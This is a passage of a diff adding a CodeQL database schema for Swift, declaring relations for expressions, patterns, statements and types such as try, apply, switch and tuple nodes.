+); + +@any_try_expr = + @force_try_expr +| @optional_try_expr +| @try_expr +; + +#keyset[id] +any_try_exprs( //dir=expr + int id: @any_try_expr ref, + int sub_expr: @expr_or_none ref +); + +applied_property_wrapper_exprs( //dir=expr + unique int id: @applied_property_wrapper_expr, + int kind: int ref, + int value: @expr_or_none ref, + int param: @param_decl_or_none ref +); + +@apply_expr = + @binary_expr +| @call_expr +| @postfix_unary_expr +| @prefix_unary_expr +| @self_apply_expr +; + +#keyset[id] +apply_exprs( //dir=expr + int id: @apply_expr ref, + int function: @expr_or_none ref +); + +#keyset[id, index] +apply_expr_arguments( //dir=expr + int id: @apply_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +assign_exprs( //dir=expr + unique int id: @assign_expr, + int dest: @expr_or_none ref, + int source: @expr_or_none ref +); + +bind_optional_exprs( //dir=expr + unique int id: @bind_optional_expr, + int sub_expr: @expr_or_none ref +); + +capture_list_exprs( //dir=expr + unique int id: @capture_list_expr, + int closure_body: @closure_expr_or_none ref +); + +#keyset[id, index] +capture_list_expr_binding_decls( //dir=expr + int id: @capture_list_expr ref, + int index: int ref, + int binding_decl: @pattern_binding_decl_or_none ref +); + +@closure_expr = + @auto_closure_expr +| @explicit_closure_expr +; + +@collection_expr = + @array_expr +| @dictionary_expr +; + +consume_exprs( //dir=expr + unique int id: @consume_expr, + int sub_expr: @expr_or_none ref +); + +copy_exprs( //dir=expr + unique int id: @copy_expr, + int sub_expr: @expr_or_none ref +); + +decl_ref_exprs( //dir=expr + unique int id: @decl_ref_expr, + int decl: @decl_or_none ref +); + +#keyset[id, index] +decl_ref_expr_replacement_types( //dir=expr + int id: @decl_ref_expr ref, + int index: int ref, + int replacement_type: @type_or_none ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] 
+decl_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_ordinary_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +default_argument_exprs( //dir=expr + unique int id: @default_argument_expr, + int param_decl: @param_decl_or_none ref, + int param_index: int ref +); + +#keyset[id] +default_argument_expr_caller_side_defaults( //dir=expr + int id: @default_argument_expr ref, + int caller_side_default: @expr_or_none ref +); + +discard_assignment_exprs( //dir=expr + unique int id: @discard_assignment_expr +); + +dot_syntax_base_ignored_exprs( //dir=expr + unique int id: @dot_syntax_base_ignored_expr, + int qualifier: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +dynamic_type_exprs( //dir=expr + unique int id: @dynamic_type_expr, + int base: @expr_or_none ref +); + +enum_is_case_exprs( //dir=expr + unique int id: @enum_is_case_expr, + int sub_expr: @expr_or_none ref, + int element: @enum_element_decl_or_none ref +); + +error_exprs( //dir=expr + unique int id: @error_expr +); + +@explicit_cast_expr = + @checked_cast_expr +| @coerce_expr +; + +#keyset[id] +explicit_cast_exprs( //dir=expr + int id: @explicit_cast_expr ref, + int sub_expr: @expr_or_none ref +); + +force_value_exprs( //dir=expr + unique int id: @force_value_expr, + int sub_expr: @expr_or_none ref +); + +@identity_expr = + @await_expr +| @borrow_expr +| @dot_self_expr +| @paren_expr +| @unresolved_member_chain_result_expr +; + +#keyset[id] +identity_exprs( //dir=expr + int id: @identity_expr ref, + int sub_expr: @expr_or_none ref +); + +if_exprs( //dir=expr + unique int id: @if_expr, + int condition: @expr_or_none ref, + int then_expr: @expr_or_none ref, + int else_expr: @expr_or_none ref +); + +@implicit_conversion_expr = + @abi_safe_conversion_expr +| @any_hashable_erasure_expr +| @archetype_to_super_expr 
+| @array_to_pointer_expr +| @bridge_from_obj_c_expr +| @bridge_to_obj_c_expr +| @class_metatype_to_object_expr +| @collection_upcast_conversion_expr +| @conditional_bridge_from_obj_c_expr +| @covariant_function_conversion_expr +| @covariant_return_conversion_expr +| @derived_to_base_expr +| @destructure_tuple_expr +| @differentiable_function_expr +| @differentiable_function_extract_original_expr +| @erasure_expr +| @existential_metatype_to_object_expr +| @foreign_object_conversion_expr +| @function_conversion_expr +| @in_out_to_pointer_expr +| @inject_into_optional_expr +| @linear_function_expr +| @linear_function_extract_original_expr +| @linear_to_differentiable_function_expr +| @load_expr +| @metatype_conversion_expr +| @pointer_to_pointer_expr +| @protocol_metatype_to_object_expr +| @string_to_pointer_expr +| @underlying_to_opaque_expr +| @unevaluated_instance_expr +| @unresolved_type_conversion_expr +; + +#keyset[id] +implicit_conversion_exprs( //dir=expr + int id: @implicit_conversion_expr ref, + int sub_expr: @expr_or_none ref +); + +in_out_exprs( //dir=expr + unique int id: @in_out_expr, + int sub_expr: @expr_or_none ref +); + +key_path_application_exprs( //dir=expr + unique int id: @key_path_application_expr, + int base: @expr_or_none ref, + int key_path: @expr_or_none ref +); + +key_path_dot_exprs( //dir=expr + unique int id: @key_path_dot_expr +); + +key_path_exprs( //dir=expr + unique int id: @key_path_expr +); + +#keyset[id] +key_path_expr_roots( //dir=expr + int id: @key_path_expr ref, + int root: @type_repr_or_none ref +); + +#keyset[id, index] +key_path_expr_components( //dir=expr + int id: @key_path_expr ref, + int index: int ref, + int component: @key_path_component_or_none ref +); + +lazy_initialization_exprs( //dir=expr + unique int id: @lazy_initialization_expr, + int sub_expr: @expr_or_none ref +); + +@literal_expr = + @builtin_literal_expr +| @interpolated_string_literal_expr +| @nil_literal_expr +| @object_literal_expr +| 
@regex_literal_expr +; + +@lookup_expr = + @dynamic_lookup_expr +| @member_ref_expr +| @subscript_expr +; + +#keyset[id] +lookup_exprs( //dir=expr + int id: @lookup_expr ref, + int base: @expr_or_none ref +); + +#keyset[id] +lookup_expr_members( //dir=expr + int id: @lookup_expr ref, + int member: @decl_or_none ref +); + +make_temporarily_escapable_exprs( //dir=expr + unique int id: @make_temporarily_escapable_expr, + int escaping_closure: @opaque_value_expr_or_none ref, + int nonescaping_closure: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +materialize_pack_exprs( //dir=expr + unique int id: @materialize_pack_expr, + int sub_expr: @expr_or_none ref +); + +obj_c_selector_exprs( //dir=expr + unique int id: @obj_c_selector_expr, + int sub_expr: @expr_or_none ref, + int method: @function_or_none ref +); + +one_way_exprs( //dir=expr + unique int id: @one_way_expr, + int sub_expr: @expr_or_none ref +); + +opaque_value_exprs( //dir=expr + unique int id: @opaque_value_expr +); + +open_existential_exprs( //dir=expr + unique int id: @open_existential_expr, + int sub_expr: @expr_or_none ref, + int existential: @expr_or_none ref, + int opaque_expr: @opaque_value_expr_or_none ref +); + +optional_evaluation_exprs( //dir=expr + unique int id: @optional_evaluation_expr, + int sub_expr: @expr_or_none ref +); + +other_initializer_ref_exprs( //dir=expr + unique int id: @other_initializer_ref_expr, + int initializer: @initializer_or_none ref +); + +overloaded_decl_ref_exprs( //dir=expr + unique int id: @overloaded_decl_ref_expr +); + +#keyset[id, index] +overloaded_decl_ref_expr_possible_declarations( //dir=expr + int id: @overloaded_decl_ref_expr ref, + int index: int ref, + int possible_declaration: @value_decl_or_none ref +); + +pack_element_exprs( //dir=expr + unique int id: @pack_element_expr, + int sub_expr: @expr_or_none ref +); + +pack_expansion_exprs( //dir=expr + unique int id: @pack_expansion_expr, + int pattern_expr: @expr_or_none ref +); + 
+property_wrapper_value_placeholder_exprs( //dir=expr + unique int id: @property_wrapper_value_placeholder_expr, + int placeholder: @opaque_value_expr_or_none ref +); + +#keyset[id] +property_wrapper_value_placeholder_expr_wrapped_values( //dir=expr + int id: @property_wrapper_value_placeholder_expr ref, + int wrapped_value: @expr_or_none ref +); + +rebind_self_in_initializer_exprs( //dir=expr + unique int id: @rebind_self_in_initializer_expr, + int sub_expr: @expr_or_none ref, + int self: @var_decl_or_none ref +); + +sequence_exprs( //dir=expr + unique int id: @sequence_expr +); + +#keyset[id, index] +sequence_expr_elements( //dir=expr + int id: @sequence_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +single_value_stmt_exprs( //dir=expr + unique int id: @single_value_stmt_expr, + int stmt: @stmt_or_none ref +); + +super_ref_exprs( //dir=expr + unique int id: @super_ref_expr, + int self: @var_decl_or_none ref +); + +tap_exprs( //dir=expr + unique int id: @tap_expr, + int body: @brace_stmt_or_none ref, + int var: @var_decl_or_none ref +); + +#keyset[id] +tap_expr_sub_exprs( //dir=expr + int id: @tap_expr ref, + int sub_expr: @expr_or_none ref +); + +tuple_element_exprs( //dir=expr + unique int id: @tuple_element_expr, + int sub_expr: @expr_or_none ref, + int index: int ref +); + +tuple_exprs( //dir=expr + unique int id: @tuple_expr +); + +#keyset[id, index] +tuple_expr_elements( //dir=expr + int id: @tuple_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +type_exprs( //dir=expr + unique int id: @type_expr +); + +#keyset[id] +type_expr_type_reprs( //dir=expr + int id: @type_expr ref, + int type_repr: @type_repr_or_none ref +); + +unresolved_decl_ref_exprs( //dir=expr + unique int id: @unresolved_decl_ref_expr +); + +#keyset[id] +unresolved_decl_ref_expr_names( //dir=expr + int id: @unresolved_decl_ref_expr ref, + string name: string ref +); + +unresolved_dot_exprs( //dir=expr + unique int id: @unresolved_dot_expr, + int 
base: @expr_or_none ref, + string name: string ref +); + +unresolved_member_exprs( //dir=expr + unique int id: @unresolved_member_expr, + string name: string ref +); + +unresolved_pattern_exprs( //dir=expr + unique int id: @unresolved_pattern_expr, + int sub_pattern: @pattern_or_none ref +); + +unresolved_specialize_exprs( //dir=expr + unique int id: @unresolved_specialize_expr, + int sub_expr: @expr_or_none ref +); + +vararg_expansion_exprs( //dir=expr + unique int id: @vararg_expansion_expr, + int sub_expr: @expr_or_none ref +); + +abi_safe_conversion_exprs( //dir=expr + unique int id: @abi_safe_conversion_expr +); + +any_hashable_erasure_exprs( //dir=expr + unique int id: @any_hashable_erasure_expr +); + +archetype_to_super_exprs( //dir=expr + unique int id: @archetype_to_super_expr +); + +array_exprs( //dir=expr + unique int id: @array_expr +); + +#keyset[id, index] +array_expr_elements( //dir=expr + int id: @array_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +array_to_pointer_exprs( //dir=expr + unique int id: @array_to_pointer_expr +); + +auto_closure_exprs( //dir=expr + unique int id: @auto_closure_expr +); + +await_exprs( //dir=expr + unique int id: @await_expr +); + +binary_exprs( //dir=expr + unique int id: @binary_expr +); + +borrow_exprs( //dir=expr + unique int id: @borrow_expr +); + +bridge_from_obj_c_exprs( //dir=expr + unique int id: @bridge_from_obj_c_expr +); + +bridge_to_obj_c_exprs( //dir=expr + unique int id: @bridge_to_obj_c_expr +); + +@builtin_literal_expr = + @boolean_literal_expr +| @magic_identifier_literal_expr +| @number_literal_expr +| @string_literal_expr +; + +call_exprs( //dir=expr + unique int id: @call_expr +); + +@checked_cast_expr = + @conditional_checked_cast_expr +| @forced_checked_cast_expr +| @is_expr +; + +class_metatype_to_object_exprs( //dir=expr + unique int id: @class_metatype_to_object_expr +); + +coerce_exprs( //dir=expr + unique int id: @coerce_expr +); + +collection_upcast_conversion_exprs( 
//dir=expr + unique int id: @collection_upcast_conversion_expr +); + +conditional_bridge_from_obj_c_exprs( //dir=expr + unique int id: @conditional_bridge_from_obj_c_expr +); + +covariant_function_conversion_exprs( //dir=expr + unique int id: @covariant_function_conversion_expr +); + +covariant_return_conversion_exprs( //dir=expr + unique int id: @covariant_return_conversion_expr +); + +derived_to_base_exprs( //dir=expr + unique int id: @derived_to_base_expr +); + +destructure_tuple_exprs( //dir=expr + unique int id: @destructure_tuple_expr +); + +dictionary_exprs( //dir=expr + unique int id: @dictionary_expr +); + +#keyset[id, index] +dictionary_expr_elements( //dir=expr + int id: @dictionary_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +differentiable_function_exprs( //dir=expr + unique int id: @differentiable_function_expr +); + +differentiable_function_extract_original_exprs( //dir=expr + unique int id: @differentiable_function_extract_original_expr +); + +dot_self_exprs( //dir=expr + unique int id: @dot_self_expr +); + +@dynamic_lookup_expr = + @dynamic_member_ref_expr +| @dynamic_subscript_expr +; + +erasure_exprs( //dir=expr + unique int id: @erasure_expr +); + +existential_metatype_to_object_exprs( //dir=expr + unique int id: @existential_metatype_to_object_expr +); + +explicit_closure_exprs( //dir=expr + unique int id: @explicit_closure_expr +); + +force_try_exprs( //dir=expr + unique int id: @force_try_expr +); + +foreign_object_conversion_exprs( //dir=expr + unique int id: @foreign_object_conversion_expr +); + +function_conversion_exprs( //dir=expr + unique int id: @function_conversion_expr +); + +in_out_to_pointer_exprs( //dir=expr + unique int id: @in_out_to_pointer_expr +); + +inject_into_optional_exprs( //dir=expr + unique int id: @inject_into_optional_expr +); + +interpolated_string_literal_exprs( //dir=expr + unique int id: @interpolated_string_literal_expr +); + +#keyset[id] 
+interpolated_string_literal_expr_interpolation_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int interpolation_expr: @opaque_value_expr_or_none ref +); + +#keyset[id] +interpolated_string_literal_expr_appending_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int appending_expr: @tap_expr_or_none ref +); + +linear_function_exprs( //dir=expr + unique int id: @linear_function_expr +); + +linear_function_extract_original_exprs( //dir=expr + unique int id: @linear_function_extract_original_expr +); + +linear_to_differentiable_function_exprs( //dir=expr + unique int id: @linear_to_differentiable_function_expr +); + +load_exprs( //dir=expr + unique int id: @load_expr +); + +member_ref_exprs( //dir=expr + unique int id: @member_ref_expr +); + +#keyset[id] +member_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_ordinary_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @member_ref_expr ref +); + +metatype_conversion_exprs( //dir=expr + unique int id: @metatype_conversion_expr +); + +nil_literal_exprs( //dir=expr + unique int id: @nil_literal_expr +); + +object_literal_exprs( //dir=expr + unique int id: @object_literal_expr, + int kind: int ref +); + +#keyset[id, index] +object_literal_expr_arguments( //dir=expr + int id: @object_literal_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +optional_try_exprs( //dir=expr + unique int id: @optional_try_expr +); + +paren_exprs( //dir=expr + unique int id: @paren_expr +); + +pointer_to_pointer_exprs( //dir=expr + unique int id: @pointer_to_pointer_expr +); + +postfix_unary_exprs( //dir=expr + unique int id: @postfix_unary_expr +); + +prefix_unary_exprs( //dir=expr + unique int 
id: @prefix_unary_expr +); + +protocol_metatype_to_object_exprs( //dir=expr + unique int id: @protocol_metatype_to_object_expr +); + +regex_literal_exprs( //dir=expr + unique int id: @regex_literal_expr, + string pattern: string ref, + int version: int ref +); + +@self_apply_expr = + @dot_syntax_call_expr +| @initializer_ref_call_expr +; + +#keyset[id] +self_apply_exprs( //dir=expr + int id: @self_apply_expr ref, + int base: @expr_or_none ref +); + +string_to_pointer_exprs( //dir=expr + unique int id: @string_to_pointer_expr +); + +subscript_exprs( //dir=expr + unique int id: @subscript_expr +); + +#keyset[id, index] +subscript_expr_arguments( //dir=expr + int id: @subscript_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +#keyset[id] +subscript_expr_has_direct_to_storage_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_ordinary_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_distributed_thunk_semantics( //dir=expr + int id: @subscript_expr ref +); + +try_exprs( //dir=expr + unique int id: @try_expr +); + +underlying_to_opaque_exprs( //dir=expr + unique int id: @underlying_to_opaque_expr +); + +unevaluated_instance_exprs( //dir=expr + unique int id: @unevaluated_instance_expr +); + +unresolved_member_chain_result_exprs( //dir=expr + unique int id: @unresolved_member_chain_result_expr +); + +unresolved_type_conversion_exprs( //dir=expr + unique int id: @unresolved_type_conversion_expr +); + +boolean_literal_exprs( //dir=expr + unique int id: @boolean_literal_expr, + boolean value: boolean ref +); + +conditional_checked_cast_exprs( //dir=expr + unique int id: @conditional_checked_cast_expr +); + +dot_syntax_call_exprs( //dir=expr + unique int id: @dot_syntax_call_expr +); + +dynamic_member_ref_exprs( //dir=expr + unique int id: 
@dynamic_member_ref_expr +); + +dynamic_subscript_exprs( //dir=expr + unique int id: @dynamic_subscript_expr +); + +forced_checked_cast_exprs( //dir=expr + unique int id: @forced_checked_cast_expr +); + +initializer_ref_call_exprs( //dir=expr + unique int id: @initializer_ref_call_expr +); + +is_exprs( //dir=expr + unique int id: @is_expr +); + +magic_identifier_literal_exprs( //dir=expr + unique int id: @magic_identifier_literal_expr, + string kind: string ref +); + +@number_literal_expr = + @float_literal_expr +| @integer_literal_expr +; + +string_literal_exprs( //dir=expr + unique int id: @string_literal_expr, + string value: string ref +); + +float_literal_exprs( //dir=expr + unique int id: @float_literal_expr, + string string_value: string ref +); + +integer_literal_exprs( //dir=expr + unique int id: @integer_literal_expr, + string string_value: string ref +); + +@pattern = + @any_pattern +| @binding_pattern +| @bool_pattern +| @enum_element_pattern +| @expr_pattern +| @is_pattern +| @named_pattern +| @optional_some_pattern +| @paren_pattern +| @tuple_pattern +| @typed_pattern +; + +#keyset[id] +pattern_types( //dir=pattern + int id: @pattern ref, + int type_: @type_or_none ref +); + +any_patterns( //dir=pattern + unique int id: @any_pattern +); + +binding_patterns( //dir=pattern + unique int id: @binding_pattern, + int sub_pattern: @pattern_or_none ref +); + +bool_patterns( //dir=pattern + unique int id: @bool_pattern, + boolean value: boolean ref +); + +enum_element_patterns( //dir=pattern + unique int id: @enum_element_pattern, + int element: @enum_element_decl_or_none ref +); + +#keyset[id] +enum_element_pattern_sub_patterns( //dir=pattern + int id: @enum_element_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +expr_patterns( //dir=pattern + unique int id: @expr_pattern, + int sub_expr: @expr_or_none ref +); + +is_patterns( //dir=pattern + unique int id: @is_pattern +); + +#keyset[id] +is_pattern_cast_type_reprs( //dir=pattern + int id: 
@is_pattern ref, + int cast_type_repr: @type_repr_or_none ref +); + +#keyset[id] +is_pattern_sub_patterns( //dir=pattern + int id: @is_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +named_patterns( //dir=pattern + unique int id: @named_pattern, + int var_decl: @var_decl_or_none ref +); + +optional_some_patterns( //dir=pattern + unique int id: @optional_some_pattern, + int sub_pattern: @pattern_or_none ref +); + +paren_patterns( //dir=pattern + unique int id: @paren_pattern, + int sub_pattern: @pattern_or_none ref +); + +tuple_patterns( //dir=pattern + unique int id: @tuple_pattern +); + +#keyset[id, index] +tuple_pattern_elements( //dir=pattern + int id: @tuple_pattern ref, + int index: int ref, + int element: @pattern_or_none ref +); + +typed_patterns( //dir=pattern + unique int id: @typed_pattern, + int sub_pattern: @pattern_or_none ref +); + +#keyset[id] +typed_pattern_type_reprs( //dir=pattern + int id: @typed_pattern ref, + int type_repr: @type_repr_or_none ref +); + +case_label_items( //dir=stmt + unique int id: @case_label_item, + int pattern: @pattern_or_none ref +); + +#keyset[id] +case_label_item_guards( //dir=stmt + int id: @case_label_item ref, + int guard: @expr_or_none ref +); + +condition_elements( //dir=stmt + unique int id: @condition_element +); + +#keyset[id] +condition_element_booleans( //dir=stmt + int id: @condition_element ref, + int boolean_: @expr_or_none ref +); + +#keyset[id] +condition_element_patterns( //dir=stmt + int id: @condition_element ref, + int pattern: @pattern_or_none ref +); + +#keyset[id] +condition_element_initializers( //dir=stmt + int id: @condition_element ref, + int initializer: @expr_or_none ref +); + +#keyset[id] +condition_element_availabilities( //dir=stmt + int id: @condition_element ref, + int availability: @availability_info_or_none ref +); + +@stmt = + @brace_stmt +| @break_stmt +| @case_stmt +| @continue_stmt +| @defer_stmt +| @discard_stmt +| @fail_stmt +| @fallthrough_stmt +| @labeled_stmt +| 
@pound_assert_stmt +| @return_stmt +| @then_stmt +| @throw_stmt +| @yield_stmt +; + +stmt_conditions( //dir=stmt + unique int id: @stmt_condition +); + +#keyset[id, index] +stmt_condition_elements( //dir=stmt + int id: @stmt_condition ref, + int index: int ref, + int element: @condition_element_or_none ref +); + +brace_stmts( //dir=stmt + unique int id: @brace_stmt +); + +#keyset[id, index] +brace_stmt_elements( //dir=stmt + int id: @brace_stmt ref, + int index: int ref, + int element: @ast_node_or_none ref +); + +break_stmts( //dir=stmt + unique int id: @break_stmt +); + +#keyset[id] +break_stmt_target_names( //dir=stmt + int id: @break_stmt ref, + string target_name: string ref +); + +#keyset[id] +break_stmt_targets( //dir=stmt + int id: @break_stmt ref, + int target: @stmt_or_none ref +); + +case_stmts( //dir=stmt + unique int id: @case_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +case_stmt_labels( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int label: @case_label_item_or_none ref +); + +#keyset[id, index] +case_stmt_variables( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +continue_stmts( //dir=stmt + unique int id: @continue_stmt +); + +#keyset[id] +continue_stmt_target_names( //dir=stmt + int id: @continue_stmt ref, + string target_name: string ref +); + +#keyset[id] +continue_stmt_targets( //dir=stmt + int id: @continue_stmt ref, + int target: @stmt_or_none ref +); + +defer_stmts( //dir=stmt + unique int id: @defer_stmt, + int body: @brace_stmt_or_none ref +); + +discard_stmts( //dir=stmt + unique int id: @discard_stmt, + int sub_expr: @expr_or_none ref +); + +fail_stmts( //dir=stmt + unique int id: @fail_stmt +); + +fallthrough_stmts( //dir=stmt + unique int id: @fallthrough_stmt, + int fallthrough_source: @case_stmt_or_none ref, + int fallthrough_dest: @case_stmt_or_none ref +); + +@labeled_stmt = + @do_catch_stmt +| @do_stmt +| @for_each_stmt +| 
@labeled_conditional_stmt +| @repeat_while_stmt +| @switch_stmt +; + +#keyset[id] +labeled_stmt_labels( //dir=stmt + int id: @labeled_stmt ref, + string label: string ref +); + +pound_assert_stmts( //dir=stmt + unique int id: @pound_assert_stmt, + int condition: @expr_or_none ref, + string message: string ref +); + +return_stmts( //dir=stmt + unique int id: @return_stmt +); + +#keyset[id] +return_stmt_results( //dir=stmt + int id: @return_stmt ref, + int result: @expr_or_none ref +); + +then_stmts( //dir=stmt + unique int id: @then_stmt, + int result: @expr_or_none ref +); + +throw_stmts( //dir=stmt + unique int id: @throw_stmt, + int sub_expr: @expr_or_none ref +); + +yield_stmts( //dir=stmt + unique int id: @yield_stmt +); + +#keyset[id, index] +yield_stmt_results( //dir=stmt + int id: @yield_stmt ref, + int index: int ref, + int result: @expr_or_none ref +); + +do_catch_stmts( //dir=stmt + unique int id: @do_catch_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +do_catch_stmt_catches( //dir=stmt + int id: @do_catch_stmt ref, + int index: int ref, + int catch: @case_stmt_or_none ref +); + +do_stmts( //dir=stmt + unique int id: @do_stmt, + int body: @brace_stmt_or_none ref +); + +for_each_stmts( //dir=stmt + unique int id: @for_each_stmt, + int pattern: @pattern_or_none ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id] +for_each_stmt_wheres( //dir=stmt + int id: @for_each_stmt ref, + int where: @expr_or_none ref +); + +#keyset[id] +for_each_stmt_iterator_vars( //dir=stmt + int id: @for_each_stmt ref, + int iteratorVar: @pattern_binding_decl_or_none ref +); + +#keyset[id] +for_each_stmt_next_calls( //dir=stmt + int id: @for_each_stmt ref, + int nextCall: @expr_or_none ref +); + +@labeled_conditional_stmt = + @guard_stmt +| @if_stmt +| @while_stmt +; + +#keyset[id] +labeled_conditional_stmts( //dir=stmt + int id: @labeled_conditional_stmt ref, + int condition: @stmt_condition_or_none ref +); + +repeat_while_stmts( //dir=stmt + unique int id: 
@repeat_while_stmt, + int condition: @expr_or_none ref, + int body: @stmt_or_none ref +); + +switch_stmts( //dir=stmt + unique int id: @switch_stmt, + int expr: @expr_or_none ref +); + +#keyset[id, index] +switch_stmt_cases( //dir=stmt + int id: @switch_stmt ref, + int index: int ref, + int case_: @case_stmt_or_none ref +); + +guard_stmts( //dir=stmt + unique int id: @guard_stmt, + int body: @brace_stmt_or_none ref +); + +if_stmts( //dir=stmt + unique int id: @if_stmt, + int then: @stmt_or_none ref +); + +#keyset[id] +if_stmt_elses( //dir=stmt + int id: @if_stmt ref, + int else: @stmt_or_none ref +); + +while_stmts( //dir=stmt + unique int id: @while_stmt, + int body: @stmt_or_none ref +); + +@type = + @any_function_type +| @any_generic_type +| @any_metatype_type +| @builtin_type +| @dependent_member_type +| @dynamic_self_type +| @error_type +| @existential_type +| @in_out_type +| @l_value_type +| @module_type +| @pack_element_type +| @pack_expansion_type +| @pack_type +| @parameterized_protocol_type +| @protocol_composition_type +| @reference_storage_type +| @substitutable_type +| @sugar_type +| @tuple_type +| @unresolved_type +; + +#keyset[id] +types( //dir=type + int id: @type ref, + string name: string ref, + int canonical_type: @type_or_none ref +); + +type_reprs( //dir=type + unique int id: @type_repr, + int type_: @type_or_none ref +); + +@any_function_type = + @function_type +| @generic_function_type +; + +#keyset[id] +any_function_types( //dir=type + int id: @any_function_type ref, + int result: @type_or_none ref +); + +#keyset[id, index] +any_function_type_param_types( //dir=type + int id: @any_function_type ref, + int index: int ref, + int param_type: @type_or_none ref +); + +#keyset[id] +any_function_type_is_throwing( //dir=type + int id: @any_function_type ref +); + +#keyset[id] +any_function_type_is_async( //dir=type + int id: @any_function_type ref +); + +@any_generic_type = + @nominal_or_bound_generic_nominal_type +| @unbound_generic_type +; + 
+#keyset[id] +any_generic_types( //dir=type + int id: @any_generic_type ref, + int declaration: @generic_type_decl_or_none ref +); + +#keyset[id] +any_generic_type_parents( //dir=type + int id: @any_generic_type ref, + int parent: @type_or_none ref +); + +@any_metatype_type = + @existential_metatype_type +| @metatype_type +; + +@builtin_type = + @any_builtin_integer_type +| @builtin_bridge_object_type +| @builtin_default_actor_storage_type +| @builtin_executor_type +| @builtin_float_type +| @builtin_job_type +| @builtin_native_object_type +| @builtin_raw_pointer_type +| @builtin_raw_unsafe_continuation_type +| @builtin_unsafe_value_buffer_type +| @builtin_vector_type +; + +dependent_member_types( //dir=type + unique int id: @dependent_member_type, + int base_type: @type_or_none ref, + int associated_type_decl: @associated_type_decl_or_none ref +); + +dynamic_self_types( //dir=type + unique int id: @dynamic_self_type, + int static_self_type: @type_or_none ref +); + +error_types( //dir=type + unique int id: @error_type +); + +existential_types( //dir=type + unique int id: @existential_type, + int constraint: @type_or_none ref +); + +in_out_types( //dir=type + unique int id: @in_out_type, + int object_type: @type_or_none ref +); + +l_value_types( //dir=type + unique int id: @l_value_type, + int object_type: @type_or_none ref +); + +module_types( //dir=type + unique int id: @module_type, + int module: @module_decl_or_none ref +); + +pack_element_types( //dir=type + unique int id: @pack_element_type, + int pack_type: @type_or_none ref +); + +pack_expansion_types( //dir=type + unique int id: @pack_expansion_type, + int pattern_type: @type_or_none ref, + int count_type: @type_or_none ref +); + +pack_types( //dir=type + unique int id: @pack_type +); + +#keyset[id, index] +pack_type_elements( //dir=type + int id: @pack_type ref, + int index: int ref, + int element: @type_or_none ref +); + +parameterized_protocol_types( //dir=type + unique int id: 
@parameterized_protocol_type, + int base: @protocol_type_or_none ref +); + +#keyset[id, index] +parameterized_protocol_type_args( //dir=type + int id: @parameterized_protocol_type ref, + int index: int ref, + int arg: @type_or_none ref +); + +protocol_composition_types( //dir=type + unique int id: @protocol_composition_type +); + +#keyset[id, index] +protocol_composition_type_members( //dir=type + int id: @protocol_composition_type ref, + int index: int ref, + int member: @type_or_none ref +); + +@reference_storage_type = + @unmanaged_storage_type +| @unowned_storage_type +| @weak_storage_type +; + +#keyset[id] +reference_storage_types( //dir=type + int id: @reference_storage_type ref, + int referent_type: @type_or_none ref +); + +@substitutable_type = + @archetype_type +| @generic_type_param_type +; + +@sugar_type = + @paren_type +| @syntax_sugar_type +| @type_alias_type +; + +tuple_types( //dir=type + unique int id: @tuple_type +); + +#keyset[id, index] +tuple_type_types( //dir=type + int id: @tuple_type ref, + int index: int ref, + int type_: @type_or_none ref +); + +#keyset[id, index] +tuple_type_names( //dir=type + int id: @tuple_type ref, + int index: int ref, + string name: string ref +); + +unresolved_types( //dir=type + unique int id: @unresolved_type +); + +@any_builtin_integer_type = + @builtin_integer_literal_type +| @builtin_integer_type +; + +@archetype_type = + @local_archetype_type +| @opaque_type_archetype_type +| @pack_archetype_type +| @primary_archetype_type +; + +#keyset[id] +archetype_types( //dir=type + int id: @archetype_type ref, + int interface_type: @type_or_none ref +); + +#keyset[id] +archetype_type_superclasses( //dir=type + int id: @archetype_type ref, + int superclass: @type_or_none ref +); + +#keyset[id, index] +archetype_type_protocols( //dir=type + int id: @archetype_type ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +builtin_bridge_object_types( //dir=type + unique int id: @builtin_bridge_object_type 
